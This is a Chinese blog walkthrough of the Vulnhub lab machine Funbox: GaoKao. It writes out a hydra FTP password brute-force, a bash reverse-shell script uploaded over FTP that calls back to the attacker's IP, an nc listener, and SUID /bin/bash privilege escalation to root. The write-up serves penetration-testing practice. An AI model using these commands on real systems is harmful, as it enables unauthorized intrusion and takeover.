Vulnhub-FUNBOX: GAOKAO渗透

于 2024-01-25 20:40:52 发布
阅读量1k 收藏 21
点赞数 35
分类专栏: Vulnhub靶机渗透 文章标签: 网络安全 网络 安全 安全威胁分析 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laoyanCZ/article/details/135826001
版权

文章目录

前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!


 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.2.4
  • 靶机IP:192.168.2.7靶机ip获取方式如下图
    在这里插入图片描述

2、渗透目标

  • 获取到/root/目录下的flag文件

3、渗透概括

  1. ftp信息获取
  2. ftp服务爆破
  3. 通过ftp建立反弹shell
  4. /bin/bash的suid提权


开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
在这里插入图片描述

可以看到,开放的几个端口分别是21/ftp 22/ssh 80/http 3306/mysql
21/ftp从扫描结果可以看到可以使用ftp的匿名用户anonymous登录,并且有一个welcome.msg的文件
22/sshssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息或者爆破才使用这个
80/http基本上大部分的漏洞都是存在于web服务上
3306/mysql是Mysql服务,后续如果获取到了一些用户信息可以用来爆破或者写马之类的

我们先看看21/ftp上的文件
我们通过如下方式下载welcome.msg文件
在这里插入图片描述

看看文件内容,如下图
在这里插入图片描述

发现了一个有意思的东西,这个文件内的内容其实就是在登录ftp时显示的消息,如下所示
发现了一个关键的信息,那就是有一个邮箱sky@funbox9其中sky可能是一个用户名
在这里插入图片描述

二、爆破FTP服务

我使用如下命令对ftp服务的sky用户进行爆破

hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 32 192.168.2.7 ftp

如下所示,sky用户的密码是thebest
在这里插入图片描述

我们使用获得的账户密码登录该靶机的ftp服务
如下所示,登录成功之后该用户的目录下有一个user.flag的文件,我们使用get命令将其下载
在这里插入图片描述

我们看看下载好的user.flag文件
如下所示,这段内容是sh脚本文件,貌似会被执行,那么这里就有操作的空间了
在这里插入图片描述

三、GetShell

我们编辑下载下来的user.flag文件,改为如下内容(反弹shell)

#!/bin/sh
/bin/bash -i >& /dev/tcp/192.168.2.4/1234 0>&1

在这里插入图片描述

我们再次登录ftp服务,将编辑完之后的user.flag文件上传
在这里插入图片描述

使用nc -lvvp 1234监听一下反弹shell
在这里插入图片描述

然后再次登录ftp随便输入个账户即可
在这里插入图片描述

如下所示,我们的nc即可监听到反弹过来的shell
使用whoami命令发现当前是sarah用户
我们再使用python3 -c 'import pty;pty.spawn("/bin/bash")'命令升级一下shell
在这里插入图片描述

四、提权

使用sudo -l发现需要密码,我们并不知道密码,就先放弃
在这里插入图片描述

我们使用如下命令找找具有suid权限的命令

find / -perm -u=s -exec ls -al {} \; 2>/dev/null

结果如下所示/bin/bash具有suid权限,那么我们就可以利用这个提权
在这里插入图片描述

如下所示,我们使用/bin/bash即可成功提权到root
在这里插入图片描述

如下所示,我们切换到/root目录
获取flag文件root.flag即完成该靶机的渗透
在这里插入图片描述

疯狂搞网安的18岁老登
关注
  • 35
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FTP爆破攻击:使用Python脚本快速测试FTP服务器的安全
weixin_43263566的博客
05-30 1791
使用Python脚本进行FTP暴力破解
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
薛定谔的猫
04-12 5029
服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。同时如果服务器没有其他安全限制,如登录来源IP,账户登录错误次数,则会可能存在被暴力破解的可能。打开kali-linux命令行窗口,输入ssh admin@193.168.1.26,任意输入用户名密码,提示访问被阻止。尝试登录FTP服务器,打开kali系统终端,输入ftp 193.168.1.23,随后输入上面获取的用户名和密码。输入search ftp_login,搜索ftp_login模块。
hydra暴力破解ftp-telnet-mysql-ssh-http
WEB渗透测试 从入门到萌新
10-09 6442
使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
vulnhub Funbox: GaoKao(funbox9)
箭雨镜屋
04-08 907
渗透思路:nmap扫描----ftp匿名访问获取可能的用户名----hydra爆破ftp密码----ftp上传反弹shell,等定时任务执行获得shell----bash suid提权
2021-10-15 ftp爆破
夕阳的街道的博客
10-15 3768
一、实验题目: ftp爆破 二、实验内容: 使用Hydra工具和口令字典进行ftp爆破 三、环境准备: (1)kali虚拟机 (2)Metasploitable靶机 四、实验步骤: (1)在kali中创建账号字典和密码字典(存放位置可自定义): 命令: touch /home/kali/Desktop/user.txt(账号字典) touch /home/kali/De...
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
funbox:测试和工具程序
02-11
"funbox"是一个用于测试和工具程序的项目,主要基于C语言开发。在软件开发过程中,测试和工具程序起着至关重要的作用,它们能够帮助开发者有效地检查代码质量、定位问题以及提升开发效率。下面我们将详细探讨这个...
i-FunBox 中文版 v1.96.938.649
04-27
软件介绍 iFunBox是一款小巧的iPhone, iPad 和 iPod Touch文件管理软件。无须越狱和任何破解,可以直接使用,不安装任何守护进程。 界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
Vulnhub日记(一):FunboxGaoKao
Dawn_Xi的博客
08-03 474
靶机介绍 FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。“Funbox Gaokao Walkthrough – Vulnhub – Writeup” 主要参考Krishna Upadhyay的WriteUp所写 虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/ 开始练习 使用Nmap找到靶机ip:192.168.56.101 本机ip:192.168.56.102 nm.
靶机渗透练习30-Funbox9-GaoKao
hirak0的博客
04-18 863
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/ Description It’s a box for beginners, but not easy. Gather careful !!! Hint: Don’t waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account. Enjoy the game
VulnHub渗透测试实战靶场 - Funbox: GaoKao
LYJ20010728的博客
08-28 1003
VulnHub渗透测试实战靶场 - Funbox: GaoKao题目描述环境下载Funbox: Lunchbreaker靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 It's a box for beginners, but not easy. Gather careful !!! Hint: Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per a
vulnhub-FunBox-wp
yutianovo的博客
08-08 509
靶机描述 Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you need hints, call me o
Vulnhub:FUNBOX-EASYENUM靶机
logan_logan的博客
06-06 280
1.浏览器输入目标靶机IP地址浏览网页 2.端口扫描 nmap -p- 192.168.31.128 nmap -sC -sV -p 22,80 192.168.31.128 3.目录枚举 目录枚举的时候找到了一个有意思的mini.php目录 gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt 4.在浏览器打开min
Python攻防-FTP服务与SSH登录暴力破解
道阻且长,行则将至。
08-08 4440
文章目录前言SSH爆破脚本演示信号量类with 用法FTP爆破服务搭建匿名扫描暴力破解总结 前言 本文继续学习下 Python 编程在网络攻防领域的应用,主要是通过 Python 脚本进行 SSH 登录爆破和 FTP 服务登录爆破。 SSH爆破 演示环境借助 Kali 虚拟机进行自身的 SSH 服务的登录爆破,注意提前修改/etc/ssh/sshd_config配置文件并执行命令service ssh start运行 SSH 服务。 脚本演示 先来看看代码: from pexpect import pxss
暴力破解FTP服务器用户名密码
热门推荐
liudan319的专栏
11-02 1万+
暴力破解FTP服务器用户名密码 破解 今天的例子很简单,就是用python的FTPLIB模块,登陆ftp服务器。并尝试用户名和密码。 大概的逻辑是,假设远程主机上有FTP服务器,我们使用用户和密码文件,不断的尝试并登陆远程ftp服务器,如果正确,打印日志。脚本很简单,主要如下: #!/usr/bin/python #coding:utf-8 import ftplib i
安鸾渗透实战平台——暴力破解(FTP服务破解)
weixin_50985113的博客
01-28 4105
第一题破解ftp 利用kali中的hydra爆破 hydra -l admin -P top100pass.txt ftp://118.190.133.35 -l:表示用户名自定义 -L:表示用户名取字典 -p:表示密码自定义 -P:表示密码取自字典 后面跟服务:ftp 用ftp工具登录(这里用的是winscp) ...
SPArta破解FTP服务器实现(漏洞扫描)
我不是猫叔
09-02 1278
通过Kali系统自带的SPArta(斯巴达)去破解Windows 的FTP服务器 准备工具 nmap 扫描网段主机检查是否该网段存在FTP21号端口或者是其他端口正在使用FTP服务 斯巴达 破解FTP协议加密(爆破用户名加字典) 组建攻击组织,搭建需要网络环境 KALI攻击机 无线网络 10.117.12.118 被攻击服务器经过NMAP扫描开启FTP服务的电脑为10.117.0.1...
FUNBOX: UNDER CONSTRUCTION!
最新发布
08-16
FUNBOX: UNDER CONSTRUCTION! 是一个面向初学者的基础级 BootToRoot 机器,难度较低。它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在查看cron.sh文件时,可以进行base64解码,然后切换到root用户并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [vulnhub--Funbox: Under Construction!](https://blog.csdn.net/qq_39991837/article/details/119374087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

疯狂搞网安的18岁老登

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值